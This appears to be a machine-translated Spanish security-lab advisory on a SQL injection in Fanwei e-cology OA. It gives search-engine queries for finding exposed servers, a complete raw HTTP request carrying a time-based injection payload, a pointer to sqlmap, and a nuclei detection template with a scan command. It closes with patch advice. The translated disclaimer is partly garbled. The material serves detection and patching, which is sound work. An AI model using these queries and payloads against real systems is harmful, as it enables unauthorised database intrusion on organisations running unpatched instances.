0x01 Notas de lectura
Los artículos técnicos de Tianqing Attack and Defense Lab son solo de referencia. La información proporcionada en este artículo está destinada únicamente al personal de seguridad de la red para probar o mantener los sitios web, servidores, etc. (incluidos, entre otros) de los que son responsables. No lo utilice sin autorización. La información técnica del artículo se utiliza para inmiscuirse en cualquier sistema informático. Las consecuencias y perjuicios directos o indirectos causados por el uso de la información proporcionada en este artículo serán asumidos por el propio usuario. Las herramientas proporcionadas en este artículo son únicamente para aprendizaje y otros usos están prohibidos. ! !
Descripción de la vulnerabilidad 0x02
(1) Ecología de Fanwei
Fanwei e-cology es una plataforma de gestión colaborativa desarrollada por Fanwei Network Technology, que admite la gestión multifuncional de recursos humanos, finanzas, administración y oficinas móviles. La vulnerabilidad se debe al hecho de que Fanwei e-cology no filtró de manera efectiva la entrada del usuario y la empalmó directamente en la declaración de consulta SQL, lo que resultó en una vulnerabilidad de inyección SQL en el sistema.
Sintaxis FOFA:
app.name=="泛微 e-cology 9.0 OA"
Sintaxis del cazador:
app.name="泛微 e-cology 9.0 OA"
app.name="泛微 e-cology OA"
(2) Poc de vulnerabilidad
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Referer: 127.0.0.1:9999/wui/index.html
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 45
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
Inyectar usando sqlmap
guión de exploración de núcleos
Fuente: https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: { {Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml
Más POC de vulnerabilidad publicado en Knowledge Planet
Un tema reciente para el planeta y algunas demostraciones de las herramientas dentro del planeta.
Envío de miembros de Inner Planet
El último día de intercambio de vulnerabilidades de seguridad web. Intercambio de habilidades de minería de vulnerabilidades.
Únase al planeta, busque el Laboratorio de Defensa y Ofensiva de Tianqing en la aplicación del planeta del conocimiento, más emocionante, así que estad atentos
plan de reparación 0x03
Mitigación de corrección oficial
enlace de parche
-
sugerencia de reparación
El funcionario ha publicado una sugerencia de reparación, recomendando que los usuarios afectados actualicen a la última versión del parche v10.58.0 lo antes posible.
Dirección de descarga: https://www.weaver.com.cn/cs/securityDownload.asp#